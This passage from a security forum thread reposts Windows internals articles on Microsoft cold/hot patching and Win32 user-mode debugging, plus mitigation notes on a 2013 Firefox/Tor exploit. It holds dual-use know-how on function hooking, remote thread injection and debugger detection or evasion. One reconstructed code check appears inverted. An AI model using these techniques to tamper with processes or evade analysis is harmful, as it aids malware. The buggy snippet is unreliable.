engineering training campaign. Mitigation Protecting against this exploit is typically straightforward: All you need to do is upgrade your Firefox browser (or Tor Bundle Browser, which was the true target of the original exploit). The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple days later, so the world has had a little over a month to get with the patched versions. Given that, it would appear that the original adversaries here had reason to believe that at least as of early August of 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services often are relying on read-only media, like a LiveCD or a RO virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks we have a case where good security advice (don't save anything on your secret operating system) got turned around into a poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
  5. Decryptare a cheilor? Sau te referi la posibilitatea de a sparge prin bruteforce chei pe 128 de biti? Aici pot da un exemplu simplu si concret: daca NSA are nevoie de 1 milion de dolari pentru a cumpara GPU-uri/CPU-uri pentru a putea sparge rapid o cheie AES pe 128 de biti, pentru a sparge o cheie pe 256 de biti ar avea nevoie de 1 milion * 1 milion = 1000 de miliarde de dolari (1.000.000.000.000 de $).
  6. https://rstforums.com/fisiere/defcon.zip
  7. Microsoft Patching Internals Author: EliCZ Caveat Emptor This article was not written to read like a novel. It is a to-the-point technical dump describing the inner workings of Microsoft's cold and hot patching process. The majority of the symbolic names listed below have been derived from NTDLL and NTOSKRNL. Please post any questions you may have directly (for the benefit of others) to this article and the author will gladly respond. The article may be updated in the future to include some of these answers inline. A companion download including examples and appropriate header files is available for download: MSPatching.zip. Cold Patching Replacing functions by replacing their containers - files and sections. The image to patch is "atomically replaced" with an image that contains all code and data contained within the original plus the fixed functions and redirections to them through embedded hooks. The functions to update are statically hooked and the hooks transfer the execution to the fixed functions in the '.text_CP' or '.text_CO' section of a coldpatch module. This section is followed by the '.DBG_POR' section in situations where the original '.data' section has to be modified. In other cases, the '.text_CP' / '.text_CO' sections are followed by '.data_CP' or '.data_CO'. Overall, there can theoretically be as many _CP / _CO sections as the original image has (.text, rdata, .data, etc..). The '.DBG_POR' section contains module imports, exports and a debug information. The debug information for the coldpatch module usually consists of two entries. The first entry is of CODEVIEW type, the second is RESERVED10. RESERVED10 data contains the coldpatch debug information that is comprised of the HOTPATCH_DEBUG_HEADER structure followed by HOTPATCH_DEBUG_DATA structure. HOTPATCH_DEBUG_HEADER.Type has value DEBUG_SIGNATURE_COLDPATCH. The contents of HOTPATCH_DEBUG_DATA are used in a process called 'target module validation' when the validation of the original module fails and hotpatch checks if there is a coldpatch present. The atomic file replacement is realized by filling the SYSTEM_HOTPATCH_CODE_INFORMATION.RenameInfo structure and calling SYSTEM_HOTPATCH_CODE_INFORMATION.Flags.HOTP_RENAME_FILES sub-function of ExApplyCodePatch (SystemHotpatchInformation class of Nt/ZwSetSystemInformation) function. HOTP_RENAME_FILES sub-function is not implemented in the newer OS versions/builds. Replacing the image on a volume doesn't mean that all the newly created processes will load/contain the updated image. For the system purposes, security or for increasing module loading speed, a sections can be emplyed in the process of the image loading. The section for a system module (ntdll.dll, ...) is updated by HOTP_UPDATE_SYSDLL sub-function (no structure required). The section for the loader (from \KnownDlls object directory) is updated by calling HOTP_UPDATE_KNOWNDLL with AtomicSwap sub-structure filled. The old object's name is swapped with newly created temporary object (update.exe names the section 'ColdPatchInstallationInProgres') in the object directory. Hot Patching Replacing functions by replacing their code in the memory. Available since Server 2003 SP0, XP SP2 x86, ia64, x64. Functions were successfully fixed on the volume. Now they should be changed in the memory - in the kernel memory for kernel modules or in the memory of user processes that contain the module to update. The functions to patch are dynamically hooked - one sufficiently long CPU instruction or data (pointer, RVA) of the function to fix is replaced with a branch instruction (pointer, RVA) that redirects an execution flow to a fixed function in the hotpatch module. After applying the hooks, the patched module in memory looks like the coldpatch module, just the targets of the branch instructions do not lie within '.text_CP' section but in the code section(s) of the hotpatch module. The hotpatch module may contain the debug information similar to the coldpatch's one, just RESERVED10 data consists of HOTPATCH_DEBUG_HEADER only and HOTPATCH_DEBUG_HEADER.Type has value DEBUG_SIGNATURE_HOTPATCH. The hotpatch module must contain a section named '.hotp1 ' that is at least 80 bytes (sizeof(HOTPATCH_HEADER)) long and that must begin with a HOTPATCH_HEADER structure. The structure is used for validating the target module, fixing relocations and creating intermediate RTL_PATCH_HEADER structure. When applying the hotpatch to a user module, an updating agent enumerates the processes and creates remote threads into them that execute ntdll.LdrHotPatchRoutine. Newer OS versions/builds allow the remote thread creation from the kernel mode when HOTP_INJECT_THREAD sub-function is called and InjectInfo sub-structure is correctly filled. LdrHotPatchRoutine checks if HOTP_USE_MODULE flag is set and the target module, whose base name is specified in UserModeInfo.TargetNameOffset, is present in the process. When applying the hotpatch to a kernel module, (ntoskrnl.MmHotPatchRoutine) both HOTP_USE_MODULE and HOTP_KERNEL_MODULE flags must be set and KernelInfo sub-structure must be filled. The Source (hotpatch) module is loaded and checked for the presence of '.hotp1 ' section, HOTPATCH_HEADER.Signature and Version. If RTL_PATCH_HEADER for the source module already exists, hooks were successfully applied and HOTP_PATCH_APPLY flag is clear, the hooks are removed. Otherwise RTL_PATCH_HEADER is created, the target module whose name is in HOTPATCH_HEADER.TargetNameRva is checked for presence and validated according to ModuleIdMethod using TargetModuleIdValue. If there's a validation mismatch, system checks whether the target module is the coldpatch according to the coldpatch debug info. If it is the coldpatch, PATCHFLAG_COLDPATCH_VALID flag is set in RTL_PATCH_HEADER.PatchFlags. The functions to fix may access the target image, they can call its functions and use its variables (it means pointers and call and jump targets do not have to be in the hotpatch module because they point directly to the target module). Such codes must be fixed using special relocation fixups from HOTPATCH_HEADER.FixupRgnRva with respect to HOTPATCH_HEADER.OrigHotpBaseAddress and HOTPATCH_HEADER.OrigTargetBaseAddress. Then the functions function as they would be called from the original module. Number of the HOTPATCH_FIXUP_ENTRY structures in the HOTPATCH_FIXUP_REGION must be even number. If the hotpatch contains standard base relocations, they usually apply only to a pointers to hotpatch's import table (APIs). Various places of the target module can be validated according to HOTPATCH_VALIDATION structures in HOTPATCH_HEADER.ValidationArrayRva. Validations with option HOTP_Valid_Hook_Target are skipped (those are the places to patch). HOTPATCH_HOOK_DESCRIPTOR structures are prepared according to HOTPATCH_HOOK structures in HOTPATCH_HEADER.HookArrayRva. HOTPATCH_HOOK.HookOptions contain in their first 5 bits the length of the instruction to replace and it must be at least as long as the length of the branch instruction - the rest is, for some hook types, padded with bytes of value 0xCC. Again there's possibility to validate the bytes that will be replaced (HOTP_Valid_Hook_Target has now no effect). If there's a mismatch and the patch place already contains the adequate branch instruction, a list of RTL_PATCH_HEADER structures in TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation is traversed and bytes at HOTPATCH_HOOK_DESCRIPTOR.CodeOffset are compared with the prepared branch instruction. If there's mismatch and the target module is the coldpatch, the validation succeeds for some hook types, for the other ones is checked whether the branch instruction points into the coldpatch. Upon succesfull validation and hook preparation are the remaining members of RTL_PATCH_HEADER filled in, the sections of the target module are made writable and the hooks are written by calling ExApplyCodePatch with RTL_PATCH_HEADER.CodeInfo and HOTP_PATCH flag set. If the patch application succeeds, RTL_PATCH_HEADER is linked to TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation list. There's no security issue: Debug and LoadDriver privileges must be enabled for all Cold/HotPatch operations except for user mode hotpatching or when applying CodeInfo directly. CodeInfo cannot be directly applied to kernel when calling ExApplyCodePatch from user mode. CodeInfo is applied "os-atomically" - the preemption is unlikely. Function to fix doesn't have to be compiled (/linked) with /hotpatch (/functionpadmin) option. There's no public tool (special version of C compiler, linker?) for creating the cold/hotpatches. It is possible to write a tool that will add/write to '.hotp1 ' section of image created by normal compiling/linking but there are 2 problems: How to write the new function with instructions pointing to target module and with this conjuncted Fixup handling. Anyway, one doesn't have to use the target module functions/data so there's no need for the hotpatch fixups. Hook Types HOTP_Hook_None HOTP_Hook_VA32 32 bit value/pointer, 4 bytes HOTP_Hook_X86_JMP x86/64 long relative jump, E9 Rel32, <-2GB..2GB-1>, Rel32 constructed according to Hook/HotpRva, >= 5 bytes, padded with 0xCC HOTP_Hook_PCREL32 not yet implemented, for fixing Rel32 of x86/64 call or jump, 4 bytes HOTP_Hook_X86_JMP2B x86/64 short relative jump, EB Rel8 <-128B..127B>, Rel8 is in HotpRva, >= 2 bytes, padded with 0xCC HOTP_Hook_VA64 64 bit value/pointer, 8 bytes HOTP_Hook_IA64_BRL ia64 branch, at HookRva must be a supported template type >= 16 bytes HOTP_Hook_IA64_BR not yet implemented HOTP_Hook_AMD64_IND x86/64 absolute indirect jump, FF 25 [Offset32 / Rip+Rel32] HotpRva (+Rip) must point to a variable that contains a pointer to fixed function, >= 6 bytes, padded with 0xCC HOTP_Hook_AMD64_CNT 16bit value/pointer, 2 bytes Hook combinations are allowed - HOTP_Hook_X86_JMP2B + HOTP_Hook_X86_JMP is typical. When the distance hotpatch-target exceeds 2GB, HOTP_Hook_AMD64_IND must be employed on x86/64. One then needs a place to store the pointer specified in [Offset32 / Rip+Rel32]. For x86 it can be inside the hotpach module but for x64 not. HOTP_Hook_AMD64_IND + HOTP_Hook_VA64 is the solution. /hotpatch option for x64 is not yet implemented but I would suggest: Buffer: //for HOTP_Hook_VA64 8x nop FnStart: 48 8D A4 24 00 00 00 00 lea rsp, [rsp + 0] - 2 bytes more than required or 0F 8x 00 00 00 00 j?? $+6 - as long as required but slower In Colpatch/After Hotpatching it could look like: Buffer: Ptr64FnContinue FnStart: FF 25 F2 FF FF FF jmp qword ptr [buffer] //[Rip-14] CC CC Of course there's possibility to make a triple patch: JMP2B -> IND -> VA64. x86 Patch Examples Function created with /hotpatch, "semi-hotpachable" function, "non-hotpatchable" function. You may notice there's replaced more than one CPU instruction (5x nop with long relative jmp) but the nops are not involved in the function - they serve as buffer. [TABLE] [TR] [TD=class: table_sub_sub_header]Original Function[/TD] [TD=class: table_sub_sub_header]ColdPatch/After HotPatching[/TD] [TD=class: table_sub_sub_header]In Cold/HotPatch[/TD] [/TR] [TR] [TD] 5x 90 5x nop FnStart: 8B FF mov edi, edi 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data 5x 90 5x nop FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data [/TD] [TD] E9 Rel32 jmp FnContinue FnStart: EB F9 jmp $-5 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data E9 Rel32 jmp FnContinue FnStart: 55 push ebp EB F8 jmp $-6 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi E9 Rel32 jmp FnContinue CC int 3 [/TD] [TD] FnStart: FnContinue: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data ; fixup required FnStart: 55 push ebp FnContinue: 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data ; fixup required FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi FnContinue: 8B 35 g_Data mov esi, g_Data ; fixup required [/TD] [/TR] [/TABLE] References - Inside Update.exe - Windows Server | Deploy, Manage, Troubleshoot - KB packages for Server2003 x86 that contain the cold/hotpatches: 819696, 823182, 888113, 893086, 899588, 901190 Sursa: OpenRCE
  8. Windows User Mode Debugging Internals Author: AlexIonescu Introduction The internal mechanisms of what allows user-mode debugging to work have rarely ever been fully explained. Even worse, these mechanisms have radically changed in Windows XP, when much of the support was re-written, as well as made more subsystem portable by including most of the routines in ntdll, as part of the Native API. This three part series will explain this functionality, starting from the Win32 (kernel32) viewpoint all the way down (or up) to the NT Kernel (ntoskrnl) component responsible for this support, called Dbgk, while taking a stop to the NT System Library (ntdll) and its DbgUi component. The reader is expected to have some basic knowledge of C and general NT Kernel architecture and semantics. Also, this is not an introduction on what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts. Win32 Debugging The Win32 subsystem of NT has allowed the debugging of processes ever since the first release, with later releases adding more features and debugging help libraries, related to symbols and other PE information. However, relatively few things have changed to the outside API user, except for the welcome addition of the ability to stop debugging a process, without killing it, which was added in Windows XP. This release of NT also contained several overhauls to the underlying implementation, which will be discussed in detail. However, one important side-effect of these changes was that LPC (and csrss.exe) were not used anymore, which allowed debugging of this binary to happen (previously, debugging this binary was impossible, since it was the one responsible for handling the kernel-to-user notifications). The basic Win32 APIs for dealing with debugging a process were simple: DebugActiveProcess, to attach, WaitForDebugEvent, to wait for debug events to come through, so that your debugging can handle them, and ContinueDebugEvent, to resume thread execution. The release of Windows XP added three more useful APIs: DebugActiveProcessStop, which allows you to stop debugging a process (detach), DebugSetProcessKillOnExit, which allows you to continue running a process even after its' been detached, and DebugBreakProcess, which allows you to perform a remote DebugBreak without having to manually create a remote thread. In Windows XP Service Pack 1, one more API was added, CheckRemoteDebuggerPresent. Much like its IsDebuggerPresent counterpart, this API allows you to check for a connected debugger in another process, without having to read the PEB remotely. Because of NT's architecture, these APIs, on recent versions of Windows (2003 will be used as an example, but the information applies to XP as well) do not much do much work themselves. Instead, they do the typical job of calling out the native functions required, and then process the output so that the Win32 caller can have it in a format that is compatible with Win9x and the original Win32 API definition. Let's look at these very simple implementations: BOOLWINAPI DebugActiveProcess(IN DWORD dwProcessId) { NTSTATUS Status; HANDLE Handle; /* Connect to the debugger */ Status = DbgUiConnectToDbg(); if (!NT_SUCCESS(Status)) { SetLastErrorByStatus(Status); return FALSE; } /* Get the process handle */ Handle = ProcessIdToHandle(dwProcessId); if (!Handle) return FALSE; /* Now debug the process */ Status = DbgUiDebugActiveProcess(Handle); NtClose(Handle); /* Check if debugging worked */ if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return FALSE; } /* Success */ return TRUE; } As you can see, the only work that's being done here is to create the initial connection to the user-mode debugging component, which is done through the DbgUi Native API Set, located in ntdll, which we'll see later. Because DbgUi uses handles instead of PIDs, the PID must first be converted with a simple helper function: HANDLEWINAPI ProcessIdToHandle(IN DWORD dwProcessId) { NTSTATUS Status; OBJECT_ATTRIBUTES ObjectAttributes; HANDLE Handle; CLIENT_ID ClientId; /* If we don't have a PID, look it up */ if (dwProcessId == -1) dwProcessId = (DWORD)CsrGetProcessId(); /* Open a handle to the process */ ClientId.UniqueProcess = (HANDLE)dwProcessId; InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); Status = NtOpenProcess(&Handle, PROCESS_ALL_ACCESS, &ObjectAttributes, &ClientId); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return 0; } /* Return the handle */ return Handle; } If you are not familiar with Native API, it is sufficient to say that this code is the simple equivalent of an OpenProcess on the PID, so that a handle can be obtained. Going back to DebugActiveProcess, the final call which does the work is DbgUiDebugActiveProcess, which is again located in the Native API. After the connection is made, we can close the handle that we had obtained from the PID previously. Other APIs function much in the same way. Let's take a look at two of the newer XP ones: BOOLWINAPI DebugBreakProcess(IN HANDLE Process) { NTSTATUS Status; /* Send the breakin request */ Status = DbgUiIssueRemoteBreakin(Process); if(!NT_SUCCESS(Status)) { /* Failure */ SetLastErrorByStatus(Status); return FALSE; } /* Success */ return TRUE; } BOOL WINAPI DebugSetProcessKillOnExit(IN BOOL KillOnExit) { HANDLE Handle; NTSTATUS Status; ULONG State; /* Get the debug object */ Handle = DbgUiGetThreadDebugObject(); if (!Handle) { /* Fail */ SetLastErrorByStatus(STATUS_INVALID_HANDLE); return FALSE; } /* Now set the kill-on-exit state */ State = KillOnExit; Status = NtSetInformationDebugObject(Handle, DebugObjectKillProcessOnExitInformation, &State, sizeof(State), NULL); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastError(Status); return FALSE; } /* Success */ return TRUE; } The first hopefully requires no explanation, as it's a simple wrapper, but let's take a look at the second. If you're familiar with the Native API, you'll instantly recognize the familiar NtSetInformationXxx type of API, which is used for setting various settings on the different types of NT Objects, such as files, processes, threads, etc. The interesting to note here, which is new to XP, is that debugging itself is also now done with a Debug Object. The specifics of this object will however be discussed later. For now, let's look at the function. The first API, DbgUiGetThreadDebugObject is another call to DbgUi, which will return a handle to the Debug Object associated with our thread (we'll see where this is stored later). Once we have the handle, we call a Native API which directly communicates with Dbgk (and not DbgUi), which will simply change a flag in the kernel's Debug Object structure. This flag, as we'll see, will be read by the kernel when detaching. A similar function to this one is the CheckRemoteDebuggerPresent, which uses the same type of NT semantics to obtain the information about the process: BOOLWINAPI CheckRemoteDebuggerPresent(IN HANDLE hProcess, OUT PBOOL pbDebuggerPresent) { HANDLE DebugPort; NTSTATUS Status; /* Make sure we have an output and process*/ if (!(pbDebuggerPresent) || !(hProcess)) { /* Fail */ SetLastError(ERROR_INVALID_PARAMETER); return FALSE; } /* Check if the process has a debug object/port */ Status = NtQueryInformationProcess(hProcess, ProcessDebugPort, (PVOID)&DebugPort, sizeof(HANDLE), NULL); if (NT_SUCCESS(Status)) { /* Return the current state */ *pbDebuggerPresent = (DebugPort) ? TRUE : FALSE; return TRUE; } /* Otherwise, fail */ SetLastErrorByStatus(Status); return FALSE; } As you can see, another NtQuery/SetInformationXxx API is being used, but this time for the process. Although you probably now that to detect debugging, one can simple check if NtCurrentPeb()->BeingDebugged, there exists another way to do this, and this is by querying the kernel. Since the kernel needs to communicate with user-mode on debugging events, it needs some sort of way of doing this. Before XP, this used to be done through an LPC port, and now, through a Debug Object (which shares the same pointer, however). Since is located in the EPROCESS structure in kernel mode, we do a query, using the DebugPort information class. If EPROCESS->DebugPort is set to something, then this API will return TRUE, which means that the process is being debugged. This trick can also be used for the local process, but it's much faster to simply read the PEB. One can notice that although some applications like to set Peb->BeingDebugged to FALSE to trick anti-debugging programs, there is no way to set DebugPort to NULL, since the Kernel itself would not let you debug (and you also don't have access to kernel structures). With that in mind, let's see how the gist of the entire Win32 debugging infrastructure, WaitForDebugEvent, is implemented. This needs to be shown before the much-simpler ContinueDebugEvent/DebugActiveProcessStop, because it introduces Win32's high-level internal structure that it uses to wrap around DbgUi. BOOLWINAPI WaitForDebugEvent(IN LPDEBUG_EVENT lpDebugEvent, IN DWORD dwMilliseconds) { LARGE_INTEGER WaitTime; PLARGE_INTEGER Timeout; DBGUI_WAIT_STATE_CHANGE WaitStateChange; NTSTATUS Status; /* Check if this is an infinite wait */ if (dwMilliseconds == INFINITE) { /* Under NT, this means no timer argument */ Timeout = NULL; } else { /* Otherwise, convert the time to NT Format */ WaitTime.QuadPart = UInt32x32To64(-10000, dwMilliseconds); Timeout = &WaitTime; } /* Loop while we keep getting interrupted */ do { /* Call the native API */ Status = DbgUiWaitStateChange(&WaitStateChange, Timeout); } while ((Status == STATUS_ALERTED) || (Status == STATUS_USER_APC)); /* Check if the wait failed */ if (!(NT_SUCCESS(Status)) || (Status != DBG_UNABLE_TO_PROVIDE_HANDLE)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check if we timed out */ if (Status == STATUS_TIMEOUT) { /* Fail with a timeout error */ SetLastError(ERROR_SEM_TIMEOUT); return FALSE; } /* Convert the structure */ Status = DbgUiConvertStateChangeStructure(&WaitStateChange, lpDebugEvent); if (!NT_SUCCESS(Status)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check what kind of event this was */ switch (lpDebugEvent->dwDebugEventCode) { /* New thread was created */ case CREATE_THREAD_DEBUG_EVENT: /* Setup the thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* New process was created */ case CREATE_PROCESS_DEBUG_EVENT: /* Setup the process data */ SaveProcessHandle(lpDebugEvent->dwProcessId, lpDebugEvent->u.CreateProcessInfo.hProcess); /* Setup the thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* Process was exited */ case EXIT_PROCESS_DEBUG_EVENT: /* Mark the thread data as such */ MarkProcessHandle(lpDebugEvent->dwProcessId); break; /* Thread was exited */ case EXIT_THREAD_DEBUG_EVENT: /* Mark the thread data */ MarkThreadHandle(lpDebugEvent->dwThreadId); break; /* Nothing to do for anything else */ default: break; } /* Return success */ return TRUE; } First, let's look at the DbgUi APIs present. The first, DbgUiWaitStateChange is the Native version of WaitForDebugEvent, and it's responsible for doing the actual wait on the Debug Object, and getting the structure associated with this event. However, DbgUi uses its own internal structures (which we'll show later) so that the Kernel can understand it, while Win32 has had much different structures defined in the Win9x ways. Therefore, one needs to convert this to the Win32 representation, and the DbgUiConvertStateChange API is what does this conversion, returning the LPDEBUG_EVENT Win32 structure that is backwards-compatible and documented on MSDN. What follows after is a switch which is interested in the creation or deletion of a new process or thread. Four APIs are used: SaveProcessHandle and SaveThreadHandle, which save these respective handles (remember that a new process must have an associated thread, so the thread handle is saved as well), and MarkProcessHandle and MarkThreadHandle, which flag these handles as being exited. Let's look as this high-level framework in detail. VOIDWINAPI SaveProcessHandle(IN DWORD dwProcessId, IN HANDLE hProcess) { PDBGSS_THREAD_DATA ThreadData; /* Allocate a thread structure */ ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA)); if (!ThreadData) return; /* Fill it out */ ThreadData->ProcessHandle = hProcess; ThreadData->ProcessId = dwProcessId; ThreadData->ThreadId = 0; ThreadData->ThreadHandle = NULL; ThreadData->HandleMarked = FALSE; /* Link it */ ThreadData->Next = DbgSsGetThreadData(); DbgSsSetThreadData(ThreadData); } This function allocates a new structure, DBGSS_THREAD_DATA, and simply fills it out with the Process handle and ID that was sent. Finally, it links it with the current DBGSS_THREAD_DATA structure, and set itself as the new current one (thus creating a circular list of DBGSS_THREAD_DATA structures). Let's take a look as this structure: typedef struct _DBGSS_THREAD_DATA{ struct _DBGSS_THREAD_DATA *Next; HANDLE ThreadHandle; HANDLE ProcessHandle; DWORD ProcessId; DWORD ThreadId; BOOLEAN HandleMarked; } DBGSS_THREAD_DATA, *PDBGSS_THREAD_DATA; This generic structure thus allows storing process/thread handles and IDs, as well as the flag which we've talked about in regards to MarkProcess/ThreadHandle. We've also seen some DbgSsSet/GetThreadData functions, which will show us where this circular array of structures is located. Let's look at their implementations: #define DbgSsSetThreadData(d) \ NtCurrentTeb()->DbgSsReserved[0] = d #define DbgSsGetThreadData() \ ((PDBGSS_THREAD_DATA)NtCurrentTeb()->DbgSsReserved[0]) Easy enough, and now we know what the first element of the mysterious DbgSsReserved array in the TEB is. Although you can probably guess the SaveThreadHandle implementation yourself, let's look at it for completeness's sake: VOIDWINAPI SaveThreadHandle(IN DWORD dwProcessId, IN DWORD dwThreadId, IN HANDLE hThread) { PDBGSS_THREAD_DATA ThreadData; /* Allocate a thread structure */ ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA)); if (!ThreadData) return; /* Fill it out */ ThreadData->ThreadHandle = hThread; ThreadData->ProcessId = dwProcessId; ThreadData->ThreadId = dwThreadId; ThreadData->ProcessHandle = NULL; ThreadData->HandleMarked = FALSE; /* Link it */ ThreadData->Next = DbgSsGetThreadData(); DbgSsSetThreadData(ThreadData); } As expected, nothing new here. The MarkThread/Process functions as just as straight-forward: VOID WINAPI MarkThreadHandle(IN DWORD dwThreadId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ThreadId == dwThreadId) { /* Mark the structure and break out */ ThreadData->HandleMarked = TRUE; break; } /* Move to the next one */ ThreadData = ThreadData->Next; } } VOID WINAPI MarkProcessHandle(IN DWORD dwProcessId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Make sure the thread ID is empty */ if (!ThreadData->ThreadId) { /* Mark the structure and break out */ ThreadData->HandleMarked = TRUE; break; } } /* Move to the next one */ ThreadData = ThreadData->Next; } } Notice that the only less-than-trivial implementation detail is that the array needs to be parsed in order to find the matching Process and Thread ID. Now that we've taken a look at these structures, let's see the associated ContinueDebugEvent API, which picks up after a WaitForDebugEvent API in order to resume the thread. BOOLWINAPI ContinueDebugEvent(IN DWORD dwProcessId, IN DWORD dwThreadId, IN DWORD dwContinueStatus) { CLIENT_ID ClientId; NTSTATUS Status; /* Set the Client ID */ ClientId.UniqueProcess = (HANDLE)dwProcessId; ClientId.UniqueThread = (HANDLE)dwThreadId; /* Continue debugging */ Status = DbgUiContinue(&ClientId, dwContinueStatus); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return FALSE; } /* Remove the process/thread handles */ RemoveHandles(dwProcessId, dwThreadId); /* Success */ return TRUE; } Again, we're dealing with a DbgUI API, DbgUiContinue, which is going to do all the work for us. Our only job is to call RemoveHandles, which is part of the high-level structures that wrap DbgUi. This functions is slightly more complex then what we've seen, because we're given PID/TIDs, so we need to do some lookups: VOIDWINAPI RemoveHandles(IN DWORD dwProcessId, IN DWORD dwThreadId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Make sure the thread ID matches too */ if (ThreadData->ThreadId == dwThreadId) { /* Check if we have a thread handle */ if (ThreadData->ThreadHandle) { /* Close it */ CloseHandle(ThreadData->ThreadHandle); } /* Check if we have a process handle */ if (ThreadData->ProcessHandle) { /* Close it */ CloseHandle(ThreadData->ProcessHandle); } /* Unlink the thread data */ DbgSsSetThreadData(ThreadData->Next); /* Free it*/ RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData); /* Move to the next structure */ ThreadData = DbgSsGetThreadData(); continue; } } /* Move to the next one */ ThreadData = ThreadData->Next; } } Not much explaining is required. As we parse the circular buffer, we try to locate a structure which matches the PID and TID that we were given. Once it's been located, we check if a handle is associated with the thread and the process. If it is, then we can now close the handle. Therefore, the use of this high-level Win32 mechanism is now apparent: it's how we can associate handles to IDs, and close them when cleaning up or continuing. This is because these handles were not opened by Win32, but behind its back by Dbgk. Once the handles are closed, we unlink this structure by changing the TEB pointer to the next structure in the array, and we then free our own Array. We then resume parsing from the next structure on (because more than one such structure could be associated with this PID/TID). Finally, one last piece of the Win32 puzzle is missing in our analysis, and this is the detach function, which was added in XP. Let's take a look at its trivial implementation: BOOLWINAPI DebugActiveProcessStop(IN DWORD dwProcessId) { NTSTATUS Status; HANDLE Handle; /* Get the process handle */ Handle = ProcessIdToHandle(dwProcessId); if (!Handle) return FALSE; /* Close all the process handles */ CloseAllProcessHandles(dwProcessId); /* Now stop debgging the process */ Status = DbgUiStopDebugging(Handle); NtClose(Handle); /* Check for failure */ if (!NT_SUCCESS(Status)) { /* Fail */ SetLastError(ERROR_ACCESS_DENIED); return FALSE; } /* Success */ return TRUE; } It couldn't really get any simpler. Just like for attaching, we first convert the PID to a handle, and then use a DbgUi call (DbgUiStopDebugging) with this process handle in order to detach ourselves from the process. There's one more call being made here, which is CloseAllProcessHandles. This is part of Win32's high-level debugging on top of DbgUi, which we've seen just earlier. This routine is very similar to RemoveHandles, but it only deals with a Process ID, so the implementation is simpler: VOIDWINAPI CloseAllProcessHandles(IN DWORD dwProcessId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Check if we have a thread handle */ if (ThreadData->ThreadHandle) { /* Close it */ CloseHandle(ThreadData->ThreadHandle); } /* Check if we have a process handle */ if (ThreadData->ProcessHandle) { /* Close it */ CloseHandle(ThreadData->ProcessHandle); } /* Unlink the thread data */ DbgSsSetThreadData(ThreadData->Next); /* Free it*/ RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData); /* Move to the next structure */ ThreadData = DbgSsGetThreadData(); continue; } /* Move to the next one */ ThreadData = ThreadData->Next; } } And this completes our analysis of the Win32 APIs! Let's take a look at what we've learnt: The actual debugging functionality is present in a module called Dbgk inside the Kernel. It's accessible through the DbgUi Native API interface, located inside the NT System Library, ntdll. Dbgk implements debugging functionality through an NT Object, called a Debug Object, which also provides an NtSetInformation API in order to modify certain flags. The Debug Object associated to a thread can be retrieved with DbgUiGetThreadObject, but we have not yet shown where this is stored. Checking if a process is being debugged can be done by using NtQueryInformationProcess and using the DebugPort information class. This cannot be cheated without a rootkit. Because Dbgk opens certain handles during Debug Events, Win32 needs a way to associated IDs and handles, and uses a circular array of structures called DBGSS_THREAD_DATA to store this in the TEB's DbgSsReserved[0] member. Sursa: OpenRCE
